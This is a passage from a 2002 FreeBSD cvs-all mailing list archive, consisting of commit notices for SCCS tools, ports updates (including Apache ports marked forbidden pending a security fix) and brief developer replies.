Message-Id: <200206181034.g5IAY1589234@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 03:34:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd prs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 03:34:00 PDT Modified files: sccs/sccscmds/cmd prs.c Log: The :PN: format as per SUSv3. Revision Changes Path 1.28 +3 -0 projects/sccs/sccscmds/cmd/prs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:41:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 849D937B403; Tue, 18 Jun 2002 03:41:25 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAfP389902; Tue, 18 Jun 2002 03:41:25 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206181041.g5IAfP389902@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 03:41:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd prs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 03:41:24 PDT Modified files: sccs/sccscmds/cmd prs.c Log: Print the pathname, :PN:, as per SUSv3 at the beginning of the delta table processor, as it is run exactly one time per file, thus fulfilling the needs. Revision Changes Path 1.29 +3 -2 projects/sccs/sccscmds/cmd/prs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:42:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 260D337B40A; Tue, 18 Jun 2002 03:42:26 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAgQD90236; Tue, 18 Jun 2002 03:42:26 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206181042.g5IAgQD90236@freefall.freebsd.org> From: Joseph Koshy Date: Tue, 18 Jun 2002 03:42:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/rtplib Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/18 03:42:26 PDT Modified files: devel Makefile Added files: devel/rtplib Makefile distinfo pkg-comment pkg-descr pkg-plist Log: `RTPlib', a library for developing applications over RTP. Revision Changes Path 1.848 +1 -0 ports/devel/Makefile 1.1 +30 -0 ports/devel/rtplib/Makefile (new) 1.1 +1 -0 ports/devel/rtplib/distinfo (new) 1.1 +1 -0 ports/devel/rtplib/pkg-comment (new) 1.1 +9 -0 ports/devel/rtplib/pkg-descr (new) 1.1 +7 -0 ports/devel/rtplib/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:42:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3067337B400; Tue, 18 Jun 2002 03:42:29 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAgTe90268; Tue, 18 Jun 2002 03:42:29 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206181042.g5IAgTe90268@freefall.freebsd.org> From: Joseph Koshy Date: Tue, 18 Jun 2002 03:42:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/18 03:42:29 PDT Modified files: . modules Log: rtplib --> ports/devel/rtplib Revision Changes Path 1.5380 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:53: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 822F337B406; Tue, 18 Jun 2002 03:53:02 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAr2T91323; Tue, 18 Jun 2002 03:53:02 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206181053.g5IAr2T91323@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 03:53:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd prs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 03:53:02 PDT Modified files: sccs/sccscmds/cmd prs.c Log: Don't initialise a variable to something meaningful only to steamroll it when you mean to compare. Oops. Submitted by: lint(1) Revision Changes Path 1.30 +1 -1 projects/sccs/sccscmds/cmd/prs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:54:27 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 19C1537B406; Tue, 18 Jun 2002 03:54:24 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8A7B55361; Tue, 18 Jun 2002 12:54:22 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Akinori MUSHA Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: www/en/projects cvsweb.sgml References: <200206171647.g5HGltf75269@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 18 Jun 2002 12:54:21 +0200 In-Reply-To: <200206171647.g5HGltf75269@freefall.freebsd.org> Message-ID: Lines: 9 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Akinori MUSHA writes: > Log: > - Mention the new maintainer, Ville Skytt,Ad(B . Please use only ASCII (or at least ISO8859-1) in commit messages. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:57:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3604837B409; Tue, 18 Jun 2002 03:57:43 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAvhL91838; Tue, 18 Jun 2002 03:57:43 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206181057.g5IAvhL91838@freefall.freebsd.org> From: Joseph Koshy Date: Tue, 18 Jun 2002 03:57:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports LEGAL X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/18 03:57:43 PDT Modified files: . LEGAL Log: Note restrictive license for "rtplib". Revision Changes Path 1.250 +2 -1 ports/LEGAL To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 4: 0:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D3DAA37B408; Tue, 18 Jun 2002 04:00:08 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IB08U92064; Tue, 18 Jun 2002 04:00:08 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206181100.g5IB08U92064@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 04:00:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd cmt.c prs.c projects/sccs/sccscmds/hdr extern.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 04:00:08 PDT Modified files: sccs/sccscmds/cmd cmt.c prs.c sccs/sccscmds/hdr extern.h Log: * Fix a bogus escape (\: should be \\:). * Kill a couple more warnings regarding return values, etc. Revision Changes Path 1.18 +5 -1 projects/sccs/sccscmds/cmd/cmt.c 1.31 +1 -1 projects/sccs/sccscmds/cmd/prs.c 1.27 +1 -1 projects/sccs/sccscmds/hdr/extern.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 4: 2:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E2F537B40B; Tue, 18 Jun 2002 04:02:14 -0700 (PDT) Received: (from naddy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IB2EB96232; Tue, 18 Jun 2002 04:02:14 -0700 (PDT) (envelope-from naddy) Message-Id: <200206181102.g5IB2EB96232@freefall.freebsd.org> From: Christian Weisgerber Date: Tue, 18 Jun 2002 04:02:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/nail Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG naddy 2002/06/18 04:02:14 PDT Modified files: mail/nail Makefile distinfo Log: Update to 9.31. Changes in this release: * New editing mechanism for attachment list: ~@ tilde escape. * The ~a tilde escape is obsoleted by ~@ and has been removed. * Header fields starting with =? are only interpreted as RFC 2047 fields if they are entirely valid (Bugreport by Russell Kroll). * Sender addresses in message lists (as in 'delete from@host') match only the exact from address. * Added ~x tilde escape (abort message composition without saving dead.letter). * Fixed recognition of RFC 2045 parameter attributes (Bugreport by Russell Kroll). * The "for" command now inserts an intact "Resent-Reply-To:" header field. Revision Changes Path 1.13 +1 -2 ports/mail/nail/Makefile 1.9 +1 -1 ports/mail/nail/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 4:13: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 21AB037B409; Tue, 18 Jun 2002 04:13:03 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IBD3m01523; Tue, 18 Jun 2002 04:13:03 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206181113.g5IBD3m01523@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 04:13:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/autogen Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 04:13:02 PDT Modified files: devel/autogen Makefile distinfo pkg-plist Log: upgrade to 5.3.8 Revision Changes Path 1.16 +1 -1 ports/devel/autogen/Makefile 1.14 +1 -1 ports/devel/autogen/distinfo 1.11 +1 -1 ports/devel/autogen/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 4:59:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 31C7237B411; Tue, 18 Jun 2002 04:59:32 -0700 (PDT) Received: (from jeh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IBxWb05521; Tue, 18 Jun 2002 04:59:32 -0700 (PDT) (envelope-from jeh) Message-Id: <200206181159.g5IBxWb05521@freefall.freebsd.org> From: "James E. Housley" Date: Tue, 18 Jun 2002 04:59:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/healthd Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeh 2002/06/18 04:59:32 PDT Modified files: sysutils/healthd Makefile distinfo Log: Zero out the sockaddr_* structures before use. Submitted by: Stefan Farfeleder Revision Changes Path 1.27 +1 -1 ports/sysutils/healthd/Makefile 1.20 +1 -1 ports/sysutils/healthd/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 5:19:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C2E3137B409; Tue, 18 Jun 2002 05:19:23 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ICJNS11808; Tue, 18 Jun 2002 05:19:23 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206181219.g5ICJNS11808@freefall.freebsd.org> From: Sheldon Hearn Date: Tue, 18 Jun 2002 05:19:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/exim-devel Makefile distinfo ports/mail/exim-devel/files POST-INSTALL-NOTES X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/18 05:19:23 PDT Modified files: mail/exim-devel Makefile distinfo mail/exim-devel/files POST-INSTALL-NOTES Log: Update to exim-4.05: * Several eximon fixes. * Several TLS fixes. * Several exim crash fixes. * Spool file handling fixes. * Memory management fixes. * Delivery process looping fix. * Fix for Darwin's case insensitive filesystem. * Many other fixes that might not affect some people, but would seriously annoy others. This port for exim is now approaching production-worthiness. I expect it to replace mail/exim some time in the next couple of months, with mail/exim being moved to mail/exim-old (if not deleted). Also, sync POST-INSTALL-NOTES with rev 1.7 of mail/exim's version. Revision Changes Path 1.116 +1 -1 ports/mail/exim-devel/Makefile 1.40 +1 -1 ports/mail/exim-devel/distinfo 1.7 +8 -6 ports/mail/exim-devel/files/POST-INSTALL-NOTES To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 5:33:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 17DCD37B405; Tue, 18 Jun 2002 05:33:15 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ICXFE13886; Tue, 18 Jun 2002 05:33:15 -0700 (PDT) (envelope-from nectar) Message-Id: <200206181233.g5ICXFE13886@freefall.freebsd.org> From: Jacques Vidrine Date: Tue, 18 Jun 2002 05:33:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/russian/apache13 Makefile ports/russian/apache13-modssl Makefile ports/www/apache13 Makefile ports/www/apache13+ipv6 Makefile ports/www/apache13-fp Makefile ports/www/apache2 Makefile ports/www/apache13-modssl Makefile ports/www/apache13-ssl Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/18 05:33:14 PDT Modified files: russian/apache13 Makefile russian/apache13-modssl Makefile www/apache13 Makefile www/apache13+ipv6 Makefile www/apache13-fp Makefile www/apache2 Makefile www/apache13-modssl Makefile www/apache13-ssl Makefile Log: Mark FORBIDDEN until an update is available. See . Revision Changes Path 1.20 +3 -0 ports/russian/apache13-modssl/Makefile 1.22 +3 -0 ports/russian/apache13/Makefile 1.28 +3 -0 ports/www/apache13+ipv6/Makefile 1.32 +3 -0 ports/www/apache13-fp/Makefile 1.101 +3 -0 ports/www/apache13-modssl/Makefile 1.77 +3 -0 ports/www/apache13-ssl/Makefile 1.118 +3 -0 ports/www/apache13/Makefile 1.117 +3 -0 ports/www/apache2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 6:14:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 146AC37B407; Tue, 18 Jun 2002 06:14:31 -0700 (PDT) Received: (from znerd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IDEVd21797; Tue, 18 Jun 2002 06:14:31 -0700 (PDT) (envelope-from znerd) Message-Id: <200206181314.g5IDEVd21797@freefall.freebsd.org> From: Ernst de Haan Date: Tue, 18 Jun 2002 06:14:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/Mk bsd.java.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG znerd 2002/06/18 06:14:30 PDT Modified files: Mk bsd.java.mk Log: Removed step 2 which used to check that the JDK ports actually exists. This unbreaks porteasy. Reported by: des Revision Changes Path 1.15 +13 -57 ports/Mk/bsd.java.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 9:50:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C24FB37B408; Tue, 18 Jun 2002 09:50:52 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IGoq654664; Tue, 18 Jun 2002 09:50:52 -0700 (PDT) (envelope-from marcus) Message-Id: <200206181650.g5IGoq654664@freefall.freebsd.org> From: Joe Marcus Clarke Date: Tue, 18 Jun 2002 09:50:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/libgda2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/18 09:50:52 PDT Modified files: databases/libgda2 Makefile Log: Fix the Postgres dependency. PR: 39472 Submitted by: NIHEI Takuji Revision Changes Path 1.20 +1 -1 ports/databases/libgda2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 9:58:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9510D37B405; Tue, 18 Jun 2002 09:58:08 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IGw8A55318; Tue, 18 Jun 2002 09:58:08 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206181658.g5IGw8A55318@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 09:58:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security Makefile ports/security/p5-Crypt-PasswdMD5 Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 09:58:08 PDT Modified files: security Makefile Added files: security/p5-Crypt-PasswdMD5 Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add p5-Crypt-PasswordMD5 1.2 Perl module that provides interoperable MD5-based crypt() function PR: 39467 Submitted by: Erwin Lansing Revision Changes Path 1.304 +1 -0 ports/security/Makefile 1.1 +25 -0 ports/security/p5-Crypt-PasswdMD5/Makefile (new) 1.1 +1 -0 ports/security/p5-Crypt-PasswdMD5/distinfo (new) 1.1 +1 -0 ports/security/p5-Crypt-PasswdMD5/pkg-comment (new) 1.1 +11 -0 ports/security/p5-Crypt-PasswdMD5/pkg-descr (new) 1.1 +4 -0 ports/security/p5-Crypt-PasswdMD5/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 9:58:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E4CE637B406; Tue, 18 Jun 2002 09:58:10 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IGwA355353; Tue, 18 Jun 2002 09:58:10 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206181658.g5IGwA355353@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 09:58:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 09:58:10 PDT Modified files: . modules Log: p5-Crypt-PasswdMD5 --> ports/security/p5-Crypt-PasswdMD5 Revision Changes Path 1.5381 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 10:33: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from epaper.eslitebooks.com (210-58-229-92.eslitebooks.com [210.58.229.92]) by hub.freebsd.org (Postfix) with ESMTP id 5665B37B405; Tue, 18 Jun 2002 10:32:59 -0700 (PDT) Received: from epaper.eslitebooks.com (epaper.eslitebooks.com [210.58.229.92]) by epaper.eslitebooks.com (8.11.6/8.11.6) with SMTP id g5IHUCP04877; Wed, 19 Jun 2002 01:30:12 +0800 (CST) (envelope-from clive@tongi.org) Received: (nullmailer pid 4874 invoked by uid 1000); Tue, 18 Jun 2002 17:30:11 -0000 Date: Wed, 19 Jun 2002 01:30:11 +0800 From: Clive Lin To: Ying-Chieh Liao , Yen-Ming Lee Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/security/amavis-perl Makefile pkg-install.postfix pkg-message.postfix Message-ID: <20020618173011.GA4707@epaper.eslitebooks.com> References: <200206171928.g5HJSLe08850@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206171928.g5HJSLe08850@freefall.freebsd.org> User-Agent: Mutt/1.3.99i X-Operating-System: FreeBSD 4.5-RELEASE-p4 i386 X-PGP-key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xA008C03E Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Okay to close ports PR# 37386 ? On Mon, Jun 17, 2002 at 12:28:21PM -0700, Ying-Chieh Liao wrote: > ijliao 2002/06/17 12:28:21 PDT > > Modified files: > security/amavis-perl Makefile > Added files: > security/amavis-perl pkg-install.postfix pkg-message.postfix > Log: > add support for postfix and exim > > PR: 32471 > Submitted by: Martijn Lina , TAKEMURA Masahiro > Tested by: TERAMOTO Masahiro , "Julian C. Dunn" > Approved by: maintainer timeout (1 month since I mailed him) > > Revision Changes Path > 1.6 +15 -3 ports/security/amavis-perl/Makefile > 1.1 +31 -0 ports/security/amavis-perl/pkg-install.postfix (new) > 1.1 +22 -0 ports/security/amavis-perl/pkg-message.postfix (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:13:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 55C2337B401; Tue, 18 Jun 2002 11:13:15 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIDFS71914; Tue, 18 Jun 2002 11:13:15 -0700 (PDT) (envelope-from obrien) Message-Id: <200206181813.g5IIDFS71914@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 11:13:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libio ChangeLog FREEBSD-upgrade Makefile.in NEWS PlotFile.cc PlotFile.h README SFile.cc SFile.h builtinbuf.cc builtinbuf.h cleanup.c config.shared configure.in depend editbuf.cc editbuf.h filebuf.cc filedoalloc.c fileops.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 11:13:15 PDT Removed files: contrib/libio ChangeLog FREEBSD-upgrade Makefile.in NEWS PlotFile.cc PlotFile.h README SFile.cc SFile.h builtinbuf.cc builtinbuf.h cleanup.c config.shared configure.in depend editbuf.cc editbuf.h filebuf.cc filedoalloc.c fileops.c floatconv.c floatio.h fstream.cc fstream.h gen-params genops.c indstream.cc indstream.h ioassign.cc ioextend.cc iofclose.c iofdopen.c iofeof.c ioferror.c iofflush.c iofflush_u.c iofgetpos.c iofgets.c iofopen.c iofprintf.c iofputs.c iofread.c iofscanf.c iofsetpos.c ioftell.c iofwrite.c iogetc.c iogetdelim.c iogetline.c iogets.c ioignore.c iolibio.h iomanip.cc iomanip.h iopadn.c ioperror.c iopopen.c ioprims.c ioprintf.c ioputc.c ioputs.c ioscanf.c ioseekoff.c ioseekpos.c iosetbuffer.c iosetvbuf.c iosprintf.c iosscanf.c iostdio.h iostream.cc iostream.h iostream.texi iostreamP.h iostrerror.c ioungetc.c iovfprintf.c iovfscanf.c iovsprintf.c iovsscanf.c isgetline.cc isgetsb.cc isscan.cc istream.h libio.h libioP.h osform.cc ostream.h outfloat.c parsestream.cc parsestream.h peekc.c pfstream.cc pfstream.h procbuf.cc procbuf.h sbform.cc sbgetline.cc sbscan.cc stdfiles.c stdiostream.cc stdiostream.h stdstrbufs.cc stdstreams.cc stream.cc stream.h streambuf.cc streambuf.h strfile.h strops.c strstream.cc strstream.h contrib/libio/config hpux.mt isc.mt linux.mt linuxaxp1-libc-lock.h linuxaxp1-stdio-lock.h linuxaxp1.mt linuxlibc1.mt mn10200.mt mtsafe.mt netware.mt contrib/libio/dbz Makefile.in README altbytes byteflip.c case.c case.h configure.in dbz.1 dbz.3z dbz.c dbz.h dbzmain.c fake.c firstlast25 getmap random.c revbytes stdio.h contrib/libio/include empty.h contrib/libio/stdio 